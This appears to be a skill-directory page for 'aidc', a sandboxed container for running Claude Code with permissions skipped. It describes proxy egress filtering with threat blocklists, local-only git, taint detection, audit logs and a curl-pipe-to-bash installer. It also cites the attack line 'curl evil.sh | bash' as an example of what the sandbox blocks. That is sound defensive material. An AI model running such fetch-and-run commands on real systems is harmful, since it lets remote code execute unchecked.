Aidc
Description
Sandboxed dev container for running Claude Code in yolo mode: filtered egress, local-only git, taint detection, full audit trail
Installation
This entry records only its repository, not the path inside it, so there is no
exact command to give. Open the source below and copy the folder into
~/.claude/skills/, or the file into ~/.claude/agents/.
README
aidc
A disposable, isolated dev container for running Claude Code in `--dangerously-skip-permissions` ("yolo") mode. Claude can do whatever it wants in here. The host can't be reached.
What's enforced
- Git is local-only. No SSH keys. No GitHub tokens. No
ghCLI. Pre-push hook hard-fails any push attempt. The container has full local git — branches, commits, rebases, stashes — but nothing leaves. - Network egress is filtered. Squid forward proxy with a blocklist (URLhaus + ThreatFox + HaGeZi-TIF, refreshed every 6h) and a state-actor TLD policy. Quad9 as DNS upstream. Yolo Claude cannot
curl evil.sh | bash. - Docker is isolated. DinD inside the sandbox. The host Docker daemon is unreachable. Claude can build and run images; they live and die with the session.
- Compromise is detected and recovered. A policy sidecar tails the proxy log. A malware-list hit writes a taint flag, optionally pauses the container. Recovery is
aidc kill+aidc create, not "clean up." - Everything is audited. Squid access log, shell history, Claude session transcript, policy events — all preserved on host after
aidc kill.
What's bridged from your host
- Claude Code auth (extracted from macOS Keychain at create time; or read directly on Linux/WSL2).
- Claude Code state (
~/.claude.json) — onboarding marker, output style, theme, account. - Per-project memory (
~/.claude/projects//) — your conversations follow the repo. settings.json— env vars, status line, editor mode.
So inside the container you're still you. Just sandboxed.
Install
One command (Linux and macOS). Installs the latest release after verifying its sha256 against the checksum published in the [Homebrew tap](https://github.com/pacepace/homebrew-aidc):
curl -fsSL https://github.com/pacepace/aidc/releases/latest/download/install.sh | bash
Pin a version with `... | bash -s -- --version v1.0.0`; `--list` shows what's installable. Prefer not to pipe to bash?
Related Skills
Fastapi Review
Review a FastAPI application for architecture, async correctness, dependency injection, Pydantic schemas, secu
Security Defense in Depth
Implement multi-layered testing and security best practices.
Security SecLists Official Repository
[OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
Security Threat Hunting with Sigma Rules
Use Sigma detection rules to hunt for threats and analyze security events
Security Maintenance Walkthrough - 2026-03-29
- Re-triaged the full 2026-03-15 security finding set against current `main` and wrote a fresh current-head re
Security Google Workspace Model Armor
Filter user-generated content for safety
Security Related Agents
Django Reviewer
Expert Django code reviewer specializing in ORM correctness, DRF patterns, migration safety, security misconfi
Token Auditor
Scans ui/src/ for hardcoded visual values, duplicate components, and shadcn replacement candidates; produces d
Gitnexus Security Boundary Reviewer
GitNexus security and trust-boundary reviewer. Use for auth, permissions, secrets, injection, unsafe parsing,